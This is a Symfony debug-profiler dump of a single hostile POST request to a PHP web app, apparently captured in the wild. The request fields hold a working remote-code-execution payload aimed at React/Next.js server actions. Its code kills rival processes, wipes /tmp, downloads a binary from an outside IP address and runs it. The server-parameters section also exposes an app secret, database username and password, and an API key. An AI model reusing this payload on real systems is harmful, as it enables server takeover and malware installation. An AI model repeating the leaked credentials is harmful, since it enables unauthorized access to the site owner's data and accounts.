HomeController :: main
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | ""$1"" |
| 1 | "{"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}" |
| 2 | ""$@3"" |
| 3 | """" |
| 4 | "[]" |
| 5 | "{"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; pkill -9 morte; kill xd.x86; pkill -9 locker; killall -9 morte 2\u003e/dev/null; killall -9 locker 2\u003e/dev/null; rm -rf /tmp/* 2\u003e/dev/null; busybox wget http://94.156.152.67:83/manji.x86 -O manji.x86 || /usr/bin/wget http://94.156.152.67:83/manji.x86 -O manji.x86 || /bin/wget http://94.156.152.67:83/manji.x86 -O manji.x86 || /sbin/wget http://94.156.152.67:83/manji.x86 -O manji.x86; chmod 777 manji.x86; ./manji.x86 nextjs\").toString();\n console.log(\"\\n[+] RCE RESULT:\\n\" + res);\n throw new Error(\"[+] RCE SUCCESS: \" + res);\n } catch(e) {\n console.log(e);\n throw e;\n }\n })()//"}" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "App\Controller\HomeController::main" |
| _firewall_context | "security.firewall.map.context.main" |
| _links | Symfony\Component\WebLink\GenericLinkProvider {#776 -links: [ 791 => Symfony\Component\WebLink\Link {#791 -rel: [ "preload" => "preload" ] -attributes: [ "as" => "style" ] -href: "/assets/styles/app-S5J-vxs.css" } ] } |
| _route | "app_home" |
| _route_params | [] |
| _security_authenticators | [] |
| _security_firewall_run | "_security_main" |
| _security_skipped_authenticators | [ Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#551 -supports: false -passport: null -duration: null -stub: "Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator" -authenticated: null -exception: null -authenticator: Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator {#495 …} } ] |
| _stopwatch_token | "182332" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip" |
| connection | "close" |
| content-length | "1567" |
| content-type | "multipart/form-data; boundary=----WebKitFormBoundaryReactCVE" |
| host | "37.27.191.161:80" |
| next-action | "x" |
| user-agent | "Mozilla/5.0" |
| x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Wed, 22 Apr 2026 14:41:31 GMT" |
| link | "</assets/styles/app-S5J-vxs.css>; rel="preload"; as="style"" |
| x-debug-token | "7817c7" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "957187ccdadf0d8b7320b2aabc9e1c98" |
| DATABASE_URL | "mysql://gt4p:2QzspDgbIsfTRiNchxc4spQL@127.0.0.1:3306/main?serverVersion=10.11.8-MariaDB" |
| FEATHERLESS_API_KEY | "rc_2fbc773dda2e6440ac43642d5948882da25717d5e29e08ee7dd4a5895e09a0a1" |
| FEATHERLESS_BASE_URL | "https://api.featherless.ai/v1" |
| FEATHERLESS_MODEL | "Mantis2024/Dirty-Muse-Writer-v01-Uncensored-Erotica-NSFW" |
| MAILER_DSN | "null://null" |
| MERCURE_JWT_SECRET | "!ChangeThisMercureHubJWTSecretKey!" |
| MERCURE_PUBLIC_URL | "https://example.com/.well-known/mercure" |
| MERCURE_URL | "https://example.com/.well-known/mercure" |
| MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "1567" |
| CONTENT_TYPE | "multipart/form-data; boundary=----WebKitFormBoundaryReactCVE" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/html" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/html" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "37.27.191.161:80" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Mozilla/5.0" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REDIRECT_STATUS | "200" |
| REDIRECT_URL | "/" |
| REMOTE_ADDR | "91.224.92.177" |
| REMOTE_PORT | "37734" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "http" |
| REQUEST_TIME | 1776868891 |
| REQUEST_TIME_FLOAT | 1776868891.7972 |
| REQUEST_URI | "/" |
| SCRIPT_FILENAME | "/var/www/html/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "37.27.191.161" |
| SERVER_ADMIN | "webmaster@localhost" |
| SERVER_NAME | "37.27.191.161" |
| SERVER_PORT | "80" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "<address>Apache/2.4.58 (Ubuntu) Server at 37.27.191.161 Port 80</address>\n" |
| SERVER_SOFTWARE | "Apache/2.4.58 (Ubuntu)" |
| SYMFONY_DOTENV_PATH | "/var/www/gt4p/.env" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,MERCURE_URL,MERCURE_PUBLIC_URL,MERCURE_JWT_SECRET,FEATHERLESS_API_KEY,FEATHERLESS_BASE_URL,FEATHERLESS_MODEL" |